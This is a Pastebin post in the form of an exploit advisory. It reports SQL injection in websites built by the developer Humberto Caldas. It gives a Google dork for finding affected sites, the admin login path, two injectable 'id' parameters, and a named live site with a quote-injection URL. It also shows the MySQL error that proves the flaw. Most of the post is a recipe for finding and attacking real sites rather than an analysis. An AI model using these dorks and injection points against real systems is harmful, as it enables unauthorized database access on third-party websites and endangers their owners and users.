KingSkrupellos

HumbertoCaldas SQL Injection

Jan 16th, 2019
88
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.41 KB | None | 0 0
  1. ##########################################################
  2.  
  3. # Exploit Title : HumbertoCaldas SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 17/01/2019
  7. # Vendor Homepage : humbertocaldas.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:''Site by Humberto Caldas"
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14.  
  15. ##########################################################
  16.  
  17. # Admin Panel Login Path :
  18. *************************
  19. /admin
  20.  
  21. # SQL Injection Exploit :
  22. ***********************
  23.  
  24. /noticia.php?id=[SQL Injection]
  25.  
  26. /galeria_id.php?id=[SQL Injection]
  27.  
  28. ##########################################################
  29.  
  30. # Example Vulnerable Site :
  31. *************************
  32.  
  33. [+] indoorpadelcenter.pt/noticia.php?id=14%27 =>
  34.  
  35. [ Proof of Concept ] => archive.is/xSKcq
  36.  
  37. ##########################################################
  38.  
  39. # SQL Database Error :
  40. **********************
  41. You have an error in your SQL syntax; check the manual
  42. that corresponds to your MySQL server version for
  43. the right syntax to use near '\'' at line 1
  44.  
  45. ##########################################################
  46.  
  47. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  48.  
  49. ##########################################################
Add Comment
Please, Sign In to add comment